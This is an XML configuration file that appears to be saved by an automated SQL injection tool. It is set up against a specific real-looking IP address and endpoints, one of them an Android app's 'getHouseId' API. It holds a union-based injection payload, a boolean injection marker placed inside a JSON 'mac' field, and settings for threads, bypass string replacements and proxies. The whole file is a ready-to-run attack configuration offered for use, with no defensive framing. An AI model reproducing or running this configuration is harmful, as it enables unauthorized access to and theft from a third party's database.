<?xml version="1.0"?>
<Config xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <saveConfigpath />
  <time />
  <domain>115.29.5.21</domain>
  <uri>/JVApp/infomix.jsp</uri>
  <pname>id</pname>
  <testPayload> and  1=2 union all select '',to_char(76613) from sysmaster:sysdual--</testPayload>
  <port>80</port>
  <maxTime>0</maxTime>
  <injectType>Bool</injectType>
  <dbType>MySQL</dbType>
  <timeOut>10</timeOut>
  <threadSize>5</threadSize>
  <reTry>1</reTry>
  <encoding>自动识别</encoding>
  <request>&lt;Encode&gt;&lt;/Encode&gt;&lt;Token&gt;&lt;/Token&gt;#inject#POST http://115.29.5.21/blueray/getHouseId HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; GHB001 Build/GHB001_1.0_20180521.155436)
Host: 115.29.5.21
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 80

#inject#{"mac":"E4:92:E7:00:00:02:F3:C0' and #inject# and 'a'='a","home_id":"3458"}</request>
  <sencondRequest />
  <key>未获取到房屋</key>
  <injectHTTPCode>200</injectHTTPCode>
  <db_encoding>UTF-8</db_encoding>
  <useCode>false</useCode>
  <columnsCount>0</columnsCount>
  <unionFillTemplate>'',{data}</unionFillTemplate>
  <sencondInject>false</sencondInject>
  <showColumn>0</showColumn>
  <reverseKey>false</reverseKey>
  <keyType>Key</keyType>
  <isMuStr>true</isMuStr>
  <is_foward_302>false</is_foward_302>
  <isOpenInfoLog>true</isOpenInfoLog>
  <isOpenHTTPLog>true</isOpenHTTPLog>
  <isAutoCheckUpdate>true</isAutoCheckUpdate>
  <isSavaConfigWhenClose>true</isSavaConfigWhenClose>
  <useSSL>false</useSSL>
  <isOpenURLEncoding>true</isOpenURLEncoding>
  <redirectDoGet>false</redirectDoGet>
  <maxClolumns>50</maxClolumns>
  <urlencodeCount>1</urlencodeCount>
  <unionFill>1</unionFill>
  <token_request />
  <token_startStr />
  <token_endStr />
  <readFileEncoding>GBK</readFileEncoding>
  <showCmdResult>true</showCmdResult>
  <reaplaceBeforURLEncode>true</reaplaceBeforURLEncode>
  <inculdeStr>false</inculdeStr>
  <keyReplace>0</keyReplace>
  <randIPToHeader />
  <sendHTTPSleepTime>0</sendHTTPSleepTime>
  <replaceStrs>convert(int,	cast(
))=1	) as varchar(2000))=1
</replaceStrs>
  <base64Count>0</base64Count>
  <useBetweenByPass>false</useBetweenByPass>
  <usehex>false</usehex>
  <useUnicode>false</useUnicode>
  <level>0</level>
  <linkCount>1</linkCount>
  <maxSpiderCount>10</maxSpiderCount>
  <maxScanCount>10</maxScanCount>
  <proxy_mode>0</proxy_mode>
  <proxy_check_host>www.baidu.com</proxy_check_host>
  <proxy_check_port>80</proxy_check_port>
  <proxy_check_Keys>百度一下，你就知道</proxy_check_Keys>
</Config>